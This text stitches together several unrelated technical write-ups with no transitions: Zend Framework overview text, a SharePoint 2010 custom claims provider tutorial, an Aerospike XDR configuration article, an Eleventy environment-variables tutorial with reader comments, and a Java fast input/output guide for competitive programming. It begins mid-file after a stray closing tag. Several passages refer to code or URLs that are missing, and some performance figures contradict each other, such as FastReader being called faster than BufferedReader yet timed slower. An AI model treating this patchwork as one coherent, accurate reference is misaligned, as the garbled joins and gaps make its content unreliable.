</VirtualHost>
The basic directory structure created will resemble the Zend Framework directory structure described above. Another aspect of Zend_Tool, automatically initialized during installation, is bootstrapping; its basic purpose is to initialize the handling of page requests. The main entry point created by Zend Framework is the index file, which provides the function to handle user requests and is the main entry point for all requests. The following shows the functionality.[14]
In general, Zend_Tool creates many important directory structures. This system is built upon Rapid Application Development (RAD) principles. As a general rule, the framework focuses on coding and project structure instead of focusing on smaller parts.[15]
The controller is the main entry point to a Zend Framework application.[16] The front controller is the main hub for accepting requests and running the correct actions as requested by the commands. The whole process of requesting and reacting is routing and dispatching (which basically means calling the correct methods in a class), which determines the functionality of the code.[16] This is implemented by Zend_Controller_Router_Interface.[16] The router finds which actions need to be run, while the dispatcher runs those requested actions.[16] The controller in Zend Framework is connected to a diverse array of structural directories, which supports efficient routing.[16] The main entry point and command controller is Zend_Controller_Front, which works as a foundation that delegates the work received and sent. The request is shaped and encapsulated in an instance of Zend_Controller_Request_Http, which provides access to HTTP requests.[16] The request object holds all of the PHP superglobals ($_GET, $_POST, $_COOKIE, $_SERVER, and $_ENV) with their relevant paths. Moreover, the controller also provides the getParam() function, which enables retrieval of request variables.
Actions are important functionality; controllers do not function without actions. To create one, we add another method with "Action" appended to its name, and the front controller will automatically recognize it as an action.[14] A controller's init() method, by contrast, is used for initialization and is not directly accessible as an action.[14] The following commands are run so that Zend_Tool can create an action for us.[14] With the standard dispatcher, all such methods are named after the action with the word "Action" appended,[16] which leads to a controller action class containing methods like indexAction, viewAction, editAction, and deleteAction.
Windows users:
bin\zf.bat create action about index
Linux/macOS users:
bin/zf.sh create action about index
An example of forms and actions is given in the Zend Framework guide.[17]
The standard router is an important front controller tool. It makes the main decisions about which module, controller and action are being requested;[14] these are all processed here. The following is the default structure.
The request follows a pattern: first, information is taken from the URL endpoint of the HTTP request. The URI is the endpoint of the request. The URL structure is as follows:[14]
The default router code example:[18]
// Assuming the following: $ctrl->setControllerDirectory(...)
Zend Framework also provides some utility methods; the following are some of the utility methods provided in the framework.[14] One of them is _forward:
_forward($action, $controller = null, $module = null, array $params = null)
Another is the _redirect utility method, the counterpart of the aforementioned _forward method.[14] _redirect performs an HTTP redirect, creating a new request.[14] The _redirect method accepts two arguments, namely $url and $options.
Furthermore, action helpers are another way to provide extra functionality within the framework; they are useful when functionality needs to be shared between controllers.[14]
// application/controllers/IndexController.php
public function init()
{
    $this->_helper->viewRenderer->setNoRender();
}
During the initialization phase of IndexController and ContactController, the viewRenderer helper is called and the noRender flag is set on the view object.[14] Without this step, an error occurs in our application.
Zend Framework provides the view layer to our project, and views for controllers and actions are automatically provided to our application. Inside the Zend Framework views folder we observe the following folders.[14]
To create a view, we write the following:[14]
<!-- application/views/scripts/index/index.phtml -->
<html>
<head>
    <title>Hello Zend</title>
</head>
<body>
    <h1>Hello Zend</h1>
    <p>Hello from Zend Framework</p>
</body>
</html>
namespace Foo\Controller;

use Zend\Mvc\Controller\AbstractActionController;
use Zend\View\Model\ViewModel;

class BazBatController extends AbstractActionController
{
    public function doSomethingCrazyAction()
    {
        $view = new ViewModel(array(
            'message' => 'Hello world',
        ));
        $view->setTemplate('foo/baz-bat/do-something-crazy');
        return $view;
    }
}
Zend Technologies, co-founded by PHP core contributors Andi Gutmans and Zeev Suraski, is the corporate sponsor of Zend Framework.[20] Technology partners include IBM,[21] Google,[22] Microsoft,[23] Adobe Systems,[24] and StrikeIron.[25]
Zend Framework features include:[26]
Zend Framework applications can run on any PHP stack that fulfills the technical requirements. Zend Technologies provides a PHP stack, Zend Server (or Zend Server Community Edition), which is advertised as optimized for running Zend Framework applications. Zend Server includes Zend Framework in its installers, along with PHP and all required extensions. According to Zend Technologies, Zend Server provides improved performance for PHP and especially Zend Framework applications through opcode acceleration and several caching capabilities, and includes application monitoring and diagnostics facilities.[29] Zend Studio is an IDE that includes features specifically for integrating with Zend Framework. It provides an MVC view, MVC code generation based on Zend_Tool (a component of the Zend Framework), a code formatter, code completion, parameter assist, and more.[30] Zend Studio is not free software, whereas the Zend Framework and Zend Server Community Edition are free. Zend Server is compatible with common debugging tools such as Xdebug. Other developers may want to use a different PHP stack and another IDE such as Eclipse PDT, which works well together with Zend Server. A pre-configured, free version of Eclipse PDT with Zend Debug is available on the Zend web site.
Code contributions to Zend Framework are subject to rigorous code, documentation, and test standards. All code must meet ZF's coding standards and unit tests must reach 80% code coverage before the corresponding code may be moved to the release branch.[31]
On September 22, 2009, Zend Technologies announced[32] that it would be working with technology partners including Microsoft, IBM, Rackspace, Nirvanix, and GoGrid, along with the Zend Framework community, to develop a common API to cloud application services called the Simple Cloud API. This project is part of Zend Framework and will be hosted on the Zend Framework website,[33] but a separate site called simplecloud.org[34] has been launched to discuss and download the most current versions of the API. The Simple Cloud API and several cloud services are included in Zend Framework. The adapters to popular cloud services have reached production quality.
To create a Hello World program, there are multiple steps, including:
Next, it needs to be ensured that the environment is correct and that there are no errors, followed by setting the date and time for tracking functionality.[16] To set up the date and time, many procedures can be followed; for example, the method date_default_timezone_set can be called, and Zend assumes that the default directory will include the PHP path.[16] The Zend Framework does not depend on any specific file, but helper classes are helpful in this case. The following are some examples:
Zend Framework 3.0 was released on June 28, 2016. It includes new components such as a JSON-RPC server, an XML-to-JSON converter, PSR-7 functionality, and compatibility with PHP 7. Zend Framework 3.0 runs up to 4 times faster than Zend Framework 2, and the packages have been decoupled to allow for greater reuse.[35] The contributors of Zend Framework actively encourage the use of Zend Framework version 3.x. The stated end of life for Zend Framework 1 is 2016-09-28, and for Zend Framework 2 it is 2018-03-31. The first development release of Zend Framework 2.0 was released on August 6, 2010.[36] Changes made in this release were the removal of require_once statements, migration to PHP 5.3 namespaces, a refactored test suite, a rewritten Zend\Session, and the addition of the new Zend\Stdlib. The second development release was on November 3, 2010.[37] The first stable release of Zend Framework 2.0 was released on 5 September 2012.
Augmenting Claims and Registering Your Provider.
using Microsoft.SharePoint.Diagnostics;
using Microsoft.SharePoint;
using Microsoft.SharePoint.Administration;
using Microsoft.SharePoint.Administration.Claims;
using Microsoft.SharePoint.WebControls;
namespace SqlClaimsProvider
{
public class SqlClaims : SPClaimProvider
{
public SqlClaims(string displayName)
: base(displayName)
{
}
}
}
public override bool SupportsEntityInformation
{
get
{
return true;
}
}
public override bool SupportsHierarchy
{
get
{
return false;
}
}
public override bool SupportsResolve
{
get
{
return false;
}
}
public override bool SupportsSearch
{
get
{
return false;
}
}
private static string SqlClaimType
{
get
{
return "";
}
}
private static string SqlClaimValueType
{
get
{
return Microsoft.IdentityModel.Claims.ClaimValueTypes.String;
}
}
Implementing a Custom SharePoint Claims Provider
Step 1:
Download the code from the link. It was written by Ted Pattison, a well-renowned SharePoint security expert.
Step 2:
The custom provider class should implement the abstract class "SPClaimProvider". Understand the declarations part, where we declare the name of the claim provider, its type and value, and the name of the custom claim that we are going to inject into the claims repository provided by the STS.
internal const string ClaimProviderDisplayName = "Audience Claim Provider";
internal const string ClaimProviderDescription = "SharePoint 2010 Demoware from Critical Path Training";
protected const string AudienceClaimType = "";
protected const string StringTypeClaim = Microsoft.IdentityModel.Claims.ClaimValueTypes.String;
public override string Name {
get { return ClaimProviderDisplayName; }
}
Step 3:
Now observe the 4 properties and 2 methods below:
public override bool SupportsEntityInformation {
get { return true; }
}
public override bool SupportsHierarchy {
get { return true; }
}
public override bool SupportsResolve {
get { return true; }
}
public override bool SupportsSearch {
get { return true; }
}
protected override void FillClaimTypes(List<string> claimTypes) {
if (claimTypes == null) throw new ArgumentException("claimTypes");
claimTypes.Add(AudienceClaimType);
}
protected override void FillClaimValueTypes(List<string> claimValueTypes) {
if (claimValueTypes == null) throw new ArgumentException("claimValueTypes");
claimValueTypes.Add(StringTypeClaim);
}
Though they look simple, these properties control the execution of the remaining code. For example, the SupportsSearch property returns true. This means that when a search happens in my site collection, the code in my claim provider will be executed instead of the default search code in SharePoint.
Step 4: We have 4 more abstract methods to override.
FillClaimsForEntity() - controls the additional claims loaded/created for the logged-in user.
FillHierarchy() - controls the claim provider hierarchy displayed in the search window.
FillSearch() - controls the search functionality in all people pickers in the site collection.
FillResolve() - controls the functionality executed when you type in a name and click the resolve button (the one with the green tick mark).
Here is where my code sample is simplified for better understanding. Instead of bringing the audience manager into scope, I simply created an array of strings representing users on my machine.
internal string[] AvailableClaims = { "administrator", "spuser", "pratap" };
I will add an extra claim for each of these users, with the claim type set to AudienceClaimType (declared above) and the claim value set to the user's name from this array.
Step 5: Look at the updated methods, with the simplest possible code.
protected override void FillClaimsForEntity(System.Uri context, SPClaim entity, List<SPClaim> claims) {
if (entity == null) throw new ArgumentException("entity");
if (claims == null) throw new ArgumentException("claims");
string userLogin = (entity.Value.Split('\\'))[1];
foreach(string claim in AvailableClaims)
{
if (userLogin.ToLower()==claim.ToLower()) {
claims.Add(CreateClaim(AudienceClaimType, claim, StringTypeClaim));
}
}
}
protected override void FillHierarchy(System.Uri context, string[] entityTypes, string hierarchyNodeID, int numberOfLevels, SPProviderHierarchyTree hierarchy) {
// No additional nodes need to be added to the People Picker
}
protected override void FillSearch(System.Uri context, string[] entityTypes, string searchPattern, string hierarchyNodeID, int maxCount, SPProviderHierarchyTree searchTree) {
if (EntityTypesContain(entityTypes, SPClaimEntityTypes.FormsRole)) {
List<string> audiences = new List<string>();
foreach (string claim in AvailableClaims) {
if (claim.StartsWith(searchPattern, StringComparison.CurrentCultureIgnoreCase))
audiences.Add(claim);
}
foreach (string audienceName in audiences)
searchTree.AddEntity(CreatePickerEntityForAudience(audienceName));
}
}
protected override void FillResolve(System.Uri context, string[] entityTypes, string resolveInput, List<PickerEntity> resolved)
{
List<string> audiences = new List<string>();
foreach (string claim in AvailableClaims)
{
if (claim.StartsWith(resolveInput, StringComparison.CurrentCultureIgnoreCase))
audiences.Add(claim);
}
foreach (string audienceName in audiences)
{
resolved.Add(CreatePickerEntityForAudience(audienceName));
}
}
Output:
Now, when I log into the application, these are the claims created because of my code.
Look at how the people picker search window changed.
If you observe, we haven't implemented anything in the FillHierarchy() method, as we didn't have any child nodes to display in our claim provider. But you can implement this method if you want to display something like the hierarchy below.
Look at how the resolving of names changed.
If you observe, the first one is resolved based on my Windows credentials, but the second one is resolved based on my claim value.
The last obvious question: what have we achieved with this?
Well, let me show you. I have a document which has to be displayed only for people whose age > 18.
We need to do 2 simple things:
1- Break the default inheritance of permissions on that document.
2- Assign the permissions to the "Youth" and "MiddleAge" claims.
Now anyone who logs in with an age less than 18 will not be able to see it. You don't need to bother about the number of people, their IDs, or their AD associations; just rely on our custom claim value.
Demo: I have a document library with 3 documents. I want to show only 2 documents to the user Pratap.
Go to those two documents and manage their permissions.
Remove all users from the access list and remove permission inheritance.
Add access to the specific claim value, in this case "pratap".
Now, when Pratap logs in, this is how the document library will be displayed.
Task accomplished. We have learned about the custom claims provider, the significance of each method in it, and, importantly, how granular security can be implemented using custom claims.
What does enable-xdr in global and namespace context control?
Detail
This article explains what the enable-xdr configuration at the global and at the namespace level controls, and when XDR connects to a remote DC and ships records.
enable-xdr is a dynamically configurable parameter which exists in 2 different contexts: global as well as namespace. It controls only the logging of digest entries in the digest log; it does not control the shipping of records. Logging to the digest log and shipping are 2 different things.
Digest logging
Refer to the 2 enable-xdr entries in the Log Reference Manual and notice the 2 different contexts, xdr as well as namespace.
For digests to be logged in the digest log (xdr-digest-log-path), the global xdr context should always have enable-xdr set to true. Digests will not be logged in the digest log if enable-xdr is set to false at the global level, irrespective of the value at the namespace level.
In the namespace context, for every namespace, one can control whether the digest log entries should be logged for that namespace on that node by setting enable-xdr to true or false at the namespace level.
The following table details the different possibilities:

enable-xdr (global) | enable-xdr (namespace) | digest entries logged for the namespace
true                | true                   | yes
true                | false                  | no
false               | true                   | no
false               | false                  | no

For a given namespace, digest log entries will be logged only when enable-xdr is true in both the global as well as the namespace contexts.
Connecting to a destination DC
As of Aerospike Enterprise Edition 3.14, XDR will only connect to a destination DC if it is seeded at the global xdr context and if at least one namespace is associated with it.
Shipping
If there are records in the digest log that have not been processed (as determined by the xdr-ship-outstanding-objects metric), XDR will keep shipping the related records irrespective of whether enable-xdr is set to true or false. This is because enable-xdr only determines whether the digest entries are logged into the digest log or not; enable-xdr does not control the shipping.
Note: By default, XDR always keeps shipping if there are pending records in the digest log. This can be controlled using the xdr-shipping-enabled config. It is usually not recommended to change this configuration outside of very specific situations.
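To make the two rules above concrete, here is a small sketch in plain JavaScript (illustrative pseudologic of my own, not Aerospike tooling) encoding the logging and shipping conditions exactly as described:

```javascript
// Digest entries are logged only when enable-xdr is true in BOTH the
// global xdr context and the namespace context.
function willLogDigest(globalEnableXdr, namespaceEnableXdr) {
  return globalEnableXdr && namespaceEnableXdr;
}

// Shipping continues whenever unprocessed records remain in the digest log;
// it is gated by xdr-shipping-enabled, not by enable-xdr.
function willShip(outstandingObjects, xdrShippingEnabled) {
  return xdrShippingEnabled && outstandingObjects > 0;
}
```

Running the truth table through willLogDigest reproduces the table above: only the true/true case logs digest entries.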
Keywords
XDR digestlog digest enable-xdr shipping
Timestamp
01/06/2018 | https://discuss.aerospike.com/t/impact-of-enable-xdr-global-v-s-namespace-context/5248 | CC-MAIN-2018-30 | en | refinedweb |
Eleventy is increasing in popularity because it allows us to create nice, simple websites, but also because it's so developer-friendly. We can build large-scale, complex projects with it, too. In this tutorial we're going to demonstrate that expansive capability by putting together a powerful and human-friendly environment variable solution.
What are environment variables?
Environment variables are handy variables/configuration values that are defined within the environment that your code finds itself in.
For example, say you have a WordPress site: you're probably going to want to connect to one database on your live site and a different one for your staging and local sites. We can hard-code these values in wp-config.php, but a good way of keeping the connection details a secret and making it easier to keep your code in source control, such as Git, is defining these away from your code.
Here's a standard-edition WordPress wp-config.php snippet with hardcoded values:
<?php
define( 'DB_NAME', 'my_cool_db' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'root' );
define( 'DB_HOST', 'localhost' );
Using the same example of a wp-config.php file, we can introduce a tool like phpdotenv and change it to something like this instead, and define the values away from the code:
<?php
$dotenv = Dotenv\Dotenv::createImmutable(__DIR__);
$dotenv->load();
define( 'DB_NAME', $_ENV['DB_NAME'] );
define( 'DB_USER', $_ENV['DB_USER'] );
define( 'DB_PASSWORD', $_ENV['DB_PASSWORD'] );
define( 'DB_HOST', $_ENV['DB_HOST'] );
A way to define these environment variable values is by using a .env file, which is a text file that is commonly ignored by source control.
We then scoop up those values (which might be unavailable to your code by default) using a tool such as dotenv or phpdotenv. Tools like dotenv are super useful because you could define these variables in an .env file, a Docker script or deploy script and it'll just work — which is my favorite type of tool!
The reason we tend to ignore these in source control (via .gitignore) is because they often contain secret keys or database connection information. Ideally, you want to keep that away from any remote repository, such as GitHub, to keep details as safe as possible.
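In practice, that usually just means adding one line to your .gitignore (the commented template suggestion is my own, not from the tutorial):

```
# keep real secrets out of the repository
.env

# optionally, commit a template with placeholder values instead:
# .env.example
```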
Getting started
For this tutorial, I’ve made some starter files to save us all a bit of time. It’s a base, bare-bones Eleventy site with all of the boring bits done for us.
Step one of this tutorial is to download the starter files and unzip them wherever you want to work with them. Once the files are unzipped, open up the folder in your terminal and run npm install. Once you've done that, run npm start. When you open your browser, it should look like this:
Also, while we're setting up: create a new, empty file called .env and add it to the root of your base files folder.
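For reference, a .env file is just KEY=value pairs, one per line. Using the variable names this tutorial wires up later (the URL value here is a placeholder of my own):

```
HELLO=hi there
OTHER_SITE_URL=https://example.com
```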
Creating a friendly interface
Environment variables are often really shouty, because we use all caps, which can get irritating. What I prefer to do is create a JavaScript interface that consumes these values and exports them as something human-friendly and namespaced, so you know just by looking at the code that you’re using environment variables.
Let's take a value like HELLO=hi there, which might be defined in our .env file. To access this, we use process.env.HELLO, which after a few calls, gets a bit tiresome. What if that value is not defined, either? It's handy to provide a fallback for these scenarios. Using a JavaScript setup, we can do this sort of thing:
require('dotenv').config();

module.exports = {
  hello: process.env.HELLO || 'Hello not set, but hi, anyway 👋'
};
What we are doing here is looking for that environment variable and setting a default value, if needed, using the OR operator (||) to return a value if it's not defined. Then, in our templates, we can do {{ env.hello }}.
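If you find yourself repeating that pattern, it can be pulled into a tiny helper. This is a sketch of my own (the helper name isn't from the tutorial); passing the env object in, rather than reading process.env directly, keeps it pure and easy to test:

```javascript
// readEnv: look up a key on an env object, falling back to a default value.
function readEnv(env, key, fallback) {
  return env[key] || fallback;
}

// In a data file, usage would look like:
// hello: readEnv(process.env, 'HELLO', 'Hello not set, but hi, anyway 👋')
module.exports = readEnv;
```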
Now that we know how this technique works, let’s make it happen. In our starter files folder, there is a directory called
src/_data with an empty
env.js file in it. Open it up and add the following code to it:
require('dotenv').config();

module.exports = {
  otherSiteUrl: process.env.OTHER_SITE_URL || '',
  hello: process.env.HELLO || 'Hello not set, but hi, anyway 👋'
};
Because our data file is called
env.js, we can access it in our templates with the
env prefix. If we wanted our environment variables to be prefixed with
environment, we would change the name of our data file to
environment.js. You can read more in the Eleventy documentation.
We’ve got our
hello value here and also an
otherSiteUrl value which we use to allow people to see the different versions of our site, based on their environment variable configs. This setup uses Eleventy JavaScript Data Files which allow us to run JavaScript and return the output as static data. They even support asynchronous code! These JavaScript Data Files are probably my favorite Eleventy feature.
Now that we have this JavaScript interface set up, let’s head over to our content and implement some variables. Open up
src/index.md and at the bottom of the file, add the following:
Here’s an example: The environment variable, HELLO is currently: “{{ env.hello }}”. This is called with {% raw %}{{ env.hello }}{% endraw %}.
Pretty cool, right? We can use these variables right in our content with Eleventy! Now, when you define or change the value of
HELLO in your
.env file and restart the
npm start task, you’ll see the content update.
Your site should look like this now:
You might be wondering what the heck
{% raw %} is. It’s a Nunjucks tag that allows you to define areas that it should ignore. Without it, Nunjucks would try to evaluate the example
{{ env.hello }} part.
Modifying image base paths
That first example we did was cool, but let’s really start exploring how this approach can be useful. Often, you will want your production images to be fronted-up with some sort of CDN, but you’ll probably also want your images running locally when you are developing your site. What this means is that to help with performance and varied image format support, we often use a CDN to serve up our images for us and these CDNs will often serve images directly from your site, such as from your
/images folder. This is exactly what I do on Piccalilli with ImgIX, but these CDNs don’t have access to the local version of the site. So, being able to switch between CDN and local images is handy.
The solution to this problem is almost trivial with environment variables — especially with Eleventy and dotenv, because if the environment variables are not defined at the point of usage, no errors are thrown.
Open up
src/_data/env.js and add the following properties to the object:
imageBase: process.env.IMAGE_BASE || '/images/',
imageProps: process.env.IMAGE_PROPS,
We’re using a default value for
imageBase of
/images/ so that if
IMAGE_BASE is not defined, our local images can be found. We don’t do the same for
imageProps because they can be empty unless we need them.
Open up
_includes/base.njk and, after the
<h1>{{ title }}</h1> bit, add the following:
<img src="{{ env.imageBase }}mountains.jpg{{ env.imageProps }}" alt="Some lush mountains at sunset" />
By default, this will load
/images/mountains.jpg. Cool! Now, open up the
.env file and add the following to it:
IMAGE_BASE=
IMAGE_PROPS=?width=1275&height=805&format=auto&quality=70
If you stop Eleventy (
Ctrl+
C in terminal) and then run
npm start again, then view source in your browser, the rendered image should look like this:
<img src="" alt="Some lush mountains at sunset" />
This means we can leverage the CodePen asset optimizations only when we need them.
Powering private and premium content with Eleventy
We can also use environment variables to conditionally render content, based on a mode, such as private mode. This is an important capability for me, personally, because I have an Eleventy Course, and CSS book, both powered by Eleventy, that only show premium content to those who have paid for it. There’s all sorts of tech magic happening behind the scenes with Service Workers and APIs, but core to it all is that content can be conditionally rendered based on
env.mode in our JavaScript interface.
Let’s add that to our example now. Open up
src/_data/env.js and add the following to the object:
mode: process.env.MODE || 'public'
This setup means that by default, the
mode is public. Now, open up
src/index.md and add the following to the bottom of the file:
{% if env.mode === 'private' %}
## This is secret content that only shows if we’re in private mode.

This is called with {% raw %}`{{ env.mode }}`{% endraw %}.

This is great for doing special private builds of the site for people that pay for content, for example.
{% endif %}
If you refresh your local version, you won’t be able to see that content that we just added. This is working perfectly for us — especially because we want to protect it. So now, let’s show it, using environment variables. Open up
.env and add the following to it:
MODE=private
Now, restart Eleventy and reload the site. You should now see something like this:
You can run this conditional rendering within the template too. For example, you could make all of the page content private and render a paywall instead. An example of that is if you go to my course without a license, you will be presented with a call to action to buy it:
Fun mode
This has hopefully been really useful content for you so far, so let’s expand on what we’ve learned and have some fun with it!
I want to finish by making a “fun mode” which completely alters the design to something more… fun. Open up
src/_includes/base.njk, and just before the closing
</head> tag, add the following:
{% if env.funMode %}
<link rel="stylesheet" href="" />
<style>
  body {
    font-family: 'Comic Sans MS', cursive;
    background: #fc427b;
    color: #391129;
  }

  h1,
  .fun {
    font-family: 'Lobster';
  }

  .fun {
    font-size: 2rem;
    max-width: 40rem;
    margin: 0 auto 3rem auto;
    background: #feb7cd;
    border: 2px dotted #fea47f;
    padding: 2rem;
    text-align: center;
  }
</style>
{% endif %}
This snippet is looking to see if our
funMode environment variable is
true and if it is, it’s adding some “fun” CSS.
Still in
base.njk, just before the opening
<article> tag, add the following code:
{% if env.funMode %}
<div class="fun">
  <p>🎉 <strong>Fun mode enabled!</strong> 🎉</p>
</div>
{% endif %}
This code is using the same logic and rendering a fun banner if
funMode is
true. Let’s create our environment variable interface for that now. Open up
src/_data/env.js and add the following to the exported object:
funMode: process.env.FUN_MODE
If
funMode is not defined, it will act as
false, because
undefined is a falsy value.
Next, open up your
.env file and add the following to it:
FUN_MODE=true
Now, restart the Eleventy task and reload your browser. It should look like this:
Pretty loud, huh?! Even though this design looks pretty awful (read: rad), I hope it demonstrates how much you can change with this environment setup.
Wrapping up
We’ve created three versions of the same site, running the same code to see all the differences:
All of these sites are powered by identical code with the only difference between each site being some environment variables which, for this example, I have defined in my Netlify dashboard.
I hope that this technique will open up all sorts of possibilities for you, using the best static site generator, Eleventy!
I feel like the code block right before “By default, this will load /images/mountains.jpg.” is false. Isn’t it supposed to be
<img src="{{ env.imageBase }}mountains.jpg{{ env.imageProps }}" alt="Some lush mountains at sunset" />?
@YellowLed – yup. Thanks for the correx! I was about to try making a similar change myself, but then saw your comment.
Thanks for this. I’ve updated it :)
Reducing Time limit of code in Java
Hey Folks! Being in the world of competitive programming, every one of us often faces TLE (Time Limit Exceeded) errors. Reducing the running time of one's code is one of the most crucial phases of learning for programmers.
One of the most popular platforms for competitive programming is CodeChef.
By default, CodeChef sets the TL (Time Limit) for any problem to 1 sec. Java has a multiplier of 2 and Python has a multiplier of 5.
Java, being a heavy language, does use extra space and time for loading the framework into the code cache along with the main program. But it is not memory issues one generally faces, but TLE.
So, one of the most common ways of reducing the running time of one's code is to use fast input and output methods. This really helps. Java is also called a slow language because of its slow input and output. Many times, just by adding fast input/output to their program and without making any changes to their logic, coders are able to get AC (All Correct).
Most problem setters explicitly reduce the TL and multipliers of their problems so as to force users to learn and use fast input/output methods.
Moreover, we often encounter problem statements saying: "Warning: Large I/O data, be careful with certain languages (though most should be OK if the algorithm is well designed)." This is a direct hint to users to use faster I/O techniques.
The ways of I/O are:
- Scanner class
- BufferedReader class
- User-defined FastReader Class
- Reader Class
Java coders generally use the Scanner class in the following way:
import java.util.Scanner;

public class Main {
    public static void main(String[] args) {
        Scanner s = new Scanner(System.in);
        int n = s.nextInt();
        int k = s.nextInt();
        int count = 0;
        while (n-- > 0) {
            int x = s.nextInt();
            if (x % k == 0)
                count++;
        }
        System.out.println(count);
    }
}
But even though it is easy and requires less typing, it is not recommended because it is very slow. In most cases we get TLE while using the Scanner class. So, instead of using the Scanner class, why not try something new?
So, here are some of the classes which are used for fast input and output.
BufferedReader class
Although this class is fast, it is not recommended because it requires a lot of typing. It reads from the character-input stream, buffering characters to provide an efficient way of reading characters, arrays, and lines. However, reading multiple words from a single line requires a StringTokenizer, which adds overhead, and hence this is not recommended. Still, it reduces the running time to approximately 0.89 s.
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.StringTokenizer;

public class Main {
    public static void main(String[] args) throws IOException {
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        StringTokenizer st = new StringTokenizer(br.readLine());
        int n = Integer.parseInt(st.nextToken());
        int k = Integer.parseInt(st.nextToken());
        int count = 0;
        while (n-- > 0) {
            int x = Integer.parseInt(br.readLine());
            if (x % k == 0)
                count++;
        }
        System.out.println(count);
    }
}
Here,
BufferedReader is a class commonly used in the Java language.
Work : It reads text from a given input stream (such as a file) by buffering characters, and hence reads characters, arrays, or lines efficiently.
StringTokenizer is also a class.
Work : It allows an application to break a string into tokens. This class is retained for compatibility reasons; however, its use is discouraged in new code, mainly because its methods do not distinguish among identifiers, numbers, and quoted strings.
The Integer.parseInt() method:
Work : It parses a String argument into an int. (Integer is the wrapper class for the int primitive data type in the Java API.)
User-defined FastReader Class
This method uses both BufferedReader and StringTokenizer and takes advantage of user-defined methods. As a result, it is time-efficient and also requires less typing. This gets accepted with a time of 1.23 s. Due to the reduced typing it is easy to remember, and it is fast enough to meet the needs of most questions in competitive coding.
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.StringTokenizer;

public class Main {
    static class FastReader {
        BufferedReader br;
        StringTokenizer st;

        public FastReader() {
            br = new BufferedReader(new InputStreamReader(System.in));
        }

        String next() {
            while (st == null || !st.hasMoreElements()) {
                try {
                    st = new StringTokenizer(br.readLine());
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            return st.nextToken();
        }

        int nextInt() {
            return Integer.parseInt(next());
        }

        long nextLong() {
            return Long.parseLong(next());
        }

        double nextDouble() {
            return Double.parseDouble(next());
        }

        String nextLine() {
            String str = "";
            try {
                str = br.readLine();
            } catch (IOException e) {
                e.printStackTrace();
            }
            return str;
        }
    }

    public static void main(String[] args) {
        FastReader s = new FastReader();
        int n = s.nextInt();
        int k = s.nextInt();
        int count = 0;
        while (n-- > 0) {
            int x = s.nextInt();
            if (x % k == 0)
                count++;
        }
        System.out.println(count);
    }
}
Here,
FastReader is a user-defined class that uses the BufferedReader and StringTokenizer classes. Both classes are described above and are very fast, hence reducing the running time of our code.
Reader Class
This is the fastest way, but it is not recommended since it is difficult to remember and cumbersome in its approach. It effectively reduces the running time of the code to just 0.28 s.
The Reader class uses a DataInputStream. It reads through the stream of data provided and offers read() and nextInt() methods for taking input.
Java.io.DataInputStream class lets an application read primitive Java data types from an underlying input stream in a machine-independent way.
The read() method is used to read a single character from the input. This method reads the stream until:
- Some IOException has occurred
- It has reached the end of the stream while reading.
This method is declared as an abstract method, i.e., subclasses of the abstract Reader class should override this method if the character-reading behavior needs to be changed.
NOTE:
- This method does not accept any parameters.
- It returns an integer value, which is the integer value of the character read.
- The returned value can range from 0 to 65535.
- It returns -1 if no character has been read.
import java.io.DataInputStream;
import java.io.FileInputStream;
import java.io.IOException;

public class Main {
    static class Reader {
        final private int BUFFER_SIZE = 1 << 16;
        private DataInputStream din;
        private byte[] buffer;
        private int bufferPointer, bytesRead;

        public Reader() {
            din = new DataInputStream(System.in);
            buffer = new byte[BUFFER_SIZE];
            bufferPointer = bytesRead = 0;
        }

        public Reader(String file_name) throws IOException {
            din = new DataInputStream(new FileInputStream(file_name));
            buffer = new byte[BUFFER_SIZE];
            bufferPointer = bytesRead = 0;
        }

        public String readLine() throws IOException {
            byte[] buf = new byte[64]; // line length
            int cnt = 0, c;
            while ((c = read()) != -1) {
                if (c == '\n')
                    break;
                buf[cnt++] = (byte) c;
            }
            return new String(buf, 0, cnt);
        }

        public int nextInt() throws IOException {
            int ret = 0;
            byte c = read();
            while (c <= ' ')
                c = read();
            boolean neg = (c == '-');
            if (neg)
                c = read();
            do {
                ret = ret * 10 + c - '0';
            } while ((c = read()) >= '0' && c <= '9');
            if (neg)
                return -ret;
            return ret;
        }

        public long nextLong() throws IOException {
            long ret = 0;
            byte c = read();
            while (c <= ' ')
                c = read();
            boolean neg = (c == '-');
            if (neg)
                c = read();
            do {
                ret = ret * 10 + c - '0';
            } while ((c = read()) >= '0' && c <= '9');
            if (neg)
                return -ret;
            return ret;
        }

        public double nextDouble() throws IOException {
            double ret = 0, div = 1;
            byte c = read();
            while (c <= ' ')
                c = read();
            boolean neg = (c == '-');
            if (neg)
                c = read();
            do {
                ret = ret * 10 + c - '0';
            } while ((c = read()) >= '0' && c <= '9');
            if (c == '.') {
                while ((c = read()) >= '0' && c <= '9') {
                    ret += (c - '0') / (div *= 10);
                }
            }
            if (neg)
                return -ret;
            return ret;
        }

        private void fillBuffer() throws IOException {
            bytesRead = din.read(buffer, bufferPointer = 0, BUFFER_SIZE);
            if (bytesRead == -1)
                buffer[0] = -1;
        }

        private byte read() throws IOException {
            if (bufferPointer == bytesRead)
                fillBuffer();
            return buffer[bufferPointer++];
        }

        public void close() throws IOException {
            if (din == null)
                return;
            din.close();
        }
    }

    public static void main(String[] args) throws IOException {
        Reader s = new Reader();
        int n = s.nextInt();
        int k = s.nextInt();
        int count = 0;
        while (n-- > 0) {
            int x = s.nextInt();
            if (x % k == 0)
                count++;
        }
        System.out.println(count);
    }
}
Some of the common methods used are:
- close() : It is an abstract void method and closes the stream of data and releases any system resources associated with it.
- mark(int readAheadLimit) : It marks the present position in the stream.
- markSupported() : It returns a boolean value indicating whether the stream supports the mark() operation.
- read() : It returns an integer value and reads a single character.
- read(char[] cbuf) : It returns an integer value and reads characters into an array.
Having implemented all these, if our code still gives TLE, we have to resort to the basic approach, i.e., changing the logic of the code to reduce its time complexity to, say, O(1), O(n) or O(log n).
The maximum time complexity that a solution can have is decided by the constraints and the time limit mentioned in the problem statement. Generally, the time limit is 1 sec and it is the constraints that vary. If the constraint is 10^8, then the maximum time complexity of code which can pass without getting TLE is O(N).
NOTE:
Time complexity of a function (or set of statements) is considered as:
- O(1) : if our code doesn’t contain any loop, recursion or call to any other non O(1) time function.
- O(n) : if our code contains only a single for-loop or while-loop.
- O(n^c) : where c is the number of nested loops present in our code.
- O(log n) : if the loop variables are divided or multiplied by some constant amount.
